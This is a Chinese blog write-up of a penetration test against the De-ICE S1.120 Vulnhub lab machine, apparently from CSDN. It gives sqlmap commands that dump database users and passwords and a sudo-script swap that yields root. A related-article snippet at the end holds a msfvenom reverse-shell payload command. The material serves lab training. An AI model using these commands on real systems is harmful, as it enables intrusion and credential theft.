De-ICE_S1.120靶机 带提权

最新推荐文章于 2024-07-31 19:29:25 发布
最新推荐文章于 2024-07-31 19:29:25 发布
阅读量312 收藏 2
点赞数 5
文章标签: 网络 linux 运维 服务器 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71232352/article/details/140806475
版权

信息收集并getshell

1.查看mac地址并将kali添加一个仅主机模式并使用dhcp分配一个192.168.1.0网段网卡,将靶机设置成仅主机模式

2.主机发现

3.端口扫描

4.首先访问80端口

5.发现提交页面

6.提交尝试一下

7.点击第三个按钮

8.发现url有id=1 尝试sql注入漏洞

python3 sqlmap.py -u "http://192.168.1.120/products.php?id=1" --current-db --batch

9.通过sqlmap跑出来用户名跟密码

python3 sqlmap.py -u "http://192.168.1.120/products.php?id=1" -D mysql --users --password --batch

10.远程连接

提权

1.发现是Linux系统

2.使用sudo提权发现不可以使用suid提权

find / -perm -u=s -type f 2>/dev/null

执行

mv getlogs.sh getlogs.sh.bak

echo"/bin/bash" > getlogs.sh

chmod 777 getlogs.sh

执行生成的文件并输入id发现提权成功

左提溜
关注
  • 5
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulnhub靶机系列:De-ICE: S1.120
汗的博客
03-30 1447
https://www.hackingarticles.in/hack-the-de-ice-s1-120-vm-boot-to-root/ 靶机地址 https://www.vulnhub.com/entry/de-ice-s1120,10/ 靶机设置 靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外i...
De-ICE_S1.120靶机
m0_61995767的博客
07-29 304
De-ICE_S1.120打靶记录
vulnhub系列:De-ICE_S1.120靶机
jq_j37的博客
07-30 292
靶机IP为静态IP:192.168.1.120,因此kali设置为仅主机,配置为相同网段。
De-ICE_S1.120靶机复现
weixin_52956666的博客
07-30 243
将getlogs.sh更改为其他名字,将/bin/bash改为getlogs.sh。到/home/ccoffee/scripts路径下。将kali和靶机都设置为仅主机模式。因为ssh服务开启,尝试远程连接。发现存在免密getlogs.sh。点击Add product。输入发现存在反射型xss注入。查看mysql数据库的表。使用sqlmap查询。
De-ICE_S1.120靶机渗透测试
weixin_58786230的博客
07-29 325
【代码】De-ICE_S1.120靶机渗透测试。
3.DE-ICE: S1.140靶机
Sam5ara的博客
01-16 447
vulnhub
De-ICES1.120靶机
hqy250019的博客
07-30 274
在执行 sudo –l 时,我们观察到在执行命令 /home/ccoffee/scripts/getlogs.sh 时没有为此用户设置密码。查看开启端口,可以看到端口 80、443、3306、21、22 已打开。切换到/home/ccoffee/scripts/目录下。命令启用了 SUID 位,这意味着我们可以执行。从截图中可以看出,在列出的所有用户中,用户。通过SSH测试它们,所有用户都可以登录系统。此时,我们还检查一下 sudo 文件的内容。,然后使用以下代码创建一个新的。点击Add Product。
exploit.tar(DC3靶机所需提权exp-1)
02-20
39772.zip
CISP-PTE_windows操作系统安全V2.0.pptx
10-22
CISP-PTE_windows操作系统安全V2.0 Windows 操作系统安全是计算机安全的重要组成部分。... ... ...访问控制是 Windows 操作系统安全的重要组成部分。访问控制列表(Access Control List,ACL)是 NTFS 文件系统的重要组成...
Kioptrix2-WalkThrough 靶机复现.docx
10-18
本文将对 Kioptrix2 靶机复现的整个过程进行详细的知识点总结,涵盖信息收集、攻击、提权等阶段的关键技术点。 信息收集阶段 在信息收集阶段,我们首先需要对靶机进行 IP 探活,以确定靶机的 IP 地址。在这里,...
crasher.tar(DC3靶机所需提权exp-2)
02-20
DC3靶机所需提权exp
网安科班精选!爱荷华大学教授的网络安全零基础入门教程!
最新发布
互联网架构小马的博客
07-31 334
网络就像一把双刃剑,给我们的生活、交流、工作和发展来了便利,但同时也给信息安全以及个人隐私来了威胁。网络和信息安全问题不仅影响了网络的普及和应用,还关系到企国家、军队、企业的信息安全和社会的经济安全,让人又爱又恨。今天给大家分享的这份手册,主要从网络漏洞、协议和安全解决方案等方面来探讨网络安全问题。我们把网络看成是不安全安全的源头,通过分析网络漏洞、探测、攻击和减少攻击的方法,来研究不同的网络协议。
Linux网络工具“瑞士军刀“集合
分享不一样的技术,与你一起共同成长!
07-26 410
下面结合之前的一些使用经验为大家介绍一下一些经典应用场景下,这个网络命令工具如何使用的。例如怎么查看当前服务器监听哪些端口、连接目标主机端口情况如何?平常我们在进行Linux服务器相关运维的时候,总会遇到一些网络相关的问题。我们可以借助这些小巧、功能强悍的工具帮助我们排查问题、解决问题...
网络安全在2024好入行吗?
2401_84466225的博客
07-29 590
024年的今天,慎重进入网安行业吧,目前来说信息安全方向的就业对于学历的容忍度比软件开发要大得多,还有很多高中被挖过来的大佬。
S5730举例
jjjxxxhhh123的博客
07-27 993
例子: 假设在校园网络中,某些交换机之间存在多个连接(可能是多个光纤),如果没有STP,这些多个连接可能导致数据包在网络中无限制地传输,形成网络风暴,导致整个网络瘫痪。PIM-SM通过仅在需要时在网络中传输组播数据包,减少网络宽的占用,提高数据传输效率。[sysname-GigabitEthernet0/0/1] ospf cost 10 // 设置接口的OSPF成本,影响路径选择。综上所述,这些网络技术和配置在大学校园网络中起到关键作用,确保网络运行高效、安全和可靠,同时满足用户的多样化需求。
保护国外使用代理IP的安全方法
iphttp的博客
07-30 366
用户在国外使用代理IP时,应该时刻保持警惕,不要随意点击可疑链接,养成良好的网络安全意识。此外,用户还应该避免在代理服务器上输入敏感信息,如银行账号、密码等。使用代理IP时,用户应该尽量使用加密协议(如SSL、TLS)来保护数据传输的安全。这将确保用户的个人信息和访问记录不会被黑客窃取或监控。在选择代理服务器时,用户应该选择那些经过验证和信任的服务器,如知名的VPN服务提供商。用户应该定期更新操作系统和软件,以确保其安全性。这样可以有效地防止黑客通过代理服务器攻击用户的计算机或移动设备。
使用 WebSocket 实现实时聊天
weixin_44976692的博客
07-28 882
在现代网络应用中,实时聊天功能已经成为用户体验的重要组成部分。无论是社交媒体平台、在线客服系统还是多人在线游戏,实时聊天功能都为用户提供了即时沟通的便利。实现实时聊天的技术有很多种,其中 WebSocket 是最受欢迎和高效的解决方案之一。本文将介绍如何使用 WebSocket 实现一个简单的实时聊天应用,包括 WebSocket 的基本概念、服务端和客户端的实现、以及一些可能的优化和扩展。WebSocket 是一种在单个 TCP 连接上进行全双工、双向交互的协议。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > shell.exe这个IP是靶机IP还是虚拟机ip
05-27
这个 IP 是指你的攻击机器 (Kali Linux) 上用于监听的 IP 地址。 假设你的攻击机器 IP 地址为 192.168.1.100,你想要在靶机上运行一个反向 TCP Meterpreter,那么你可以使用以下命令生成 Payload 文件: ``` msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > shell.exe ``` 其中,LHOST 参数指定了反向连接时的目标 IP 地址,即指定 Meterpreter 连接的攻击机器 IP 地址。LPORT 参数指定了监听的端口号,这个端口号需要和后面启动 Meterpreter listener 时使用的端口号一致。 在生成 Payload 文件后,你需要将它传输到靶机上,并在靶机上运行它。当 Payload 文件在靶机上被执行时,它会尝试连接到你指定的攻击机器 IP 地址和端口号,从而建立反向连接。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值